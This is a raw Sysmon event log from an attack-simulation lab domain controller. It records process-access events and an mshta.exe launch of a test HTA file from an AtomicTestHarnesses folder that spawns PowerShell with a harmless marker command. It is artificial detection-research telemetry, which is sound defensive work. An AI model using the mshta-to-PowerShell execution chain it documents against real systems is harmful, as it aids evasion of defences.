15:59:17.023{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023502Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.616{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023501Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.616{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023500Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.585{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023499Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.585{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000023498Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.538{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_b1fmovce.2jo.ps12021-01-20 15:59:18.538 10341000x800000000000000023497Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.523{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023496Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.476{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3C06-00000000A301}5376C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023495Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.476{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3C06-00000000A301}5376C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023494Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.476{7901BC46-5356-6008-3C06-00000000A301}53767696C:\Windows\system32\conhost.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023493Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.460{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5356-6008-3C06-00000000A301}5376C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023492Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.460{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023491Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.460{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023490Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.460{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023489Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.460{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023488Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.460{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023487Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.460{7901BC46-5356-6008-3A06-00000000A301}76605488C:\Windows\SysWOW64\mshta.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\System32\windows.storage.dll+1240e6(wow64)|C:\Windows\System32\windows.storage.dll+123da1(wow64)|C:\Windows\System32\windows.storage.dll+123e73(wow64)|C:\Windows\System32\windows.storage.dll+124b45(wow64)|C:\Windows\System32\windows.storage.dll+1239f1(wow64)|C:\Windows\System32\windows.storage.dll+125d40(wow64)|C:\Windows\System32\windows.storage.dll+125fbc(wow64)|C:\Windows\System32\windows.storage.dll+1258a5(wow64)|C:\Windows\System32\shell32.dll+1a82b4(wow64)|C:\Windows\System32\shell32.dll+1a818e(wow64)|C:\Windows\System32\shell32.dll+13be0a(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000023486Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.462{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 10341000x800000000000000023485Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.429{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023484Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.429{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023483Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.413{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023482Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.413{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023481Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.413{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023480Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.398{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023479Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.398{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023478Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.366{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023477Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.366{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023476Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.366{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023475Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.366{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023474Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.366{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023473Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 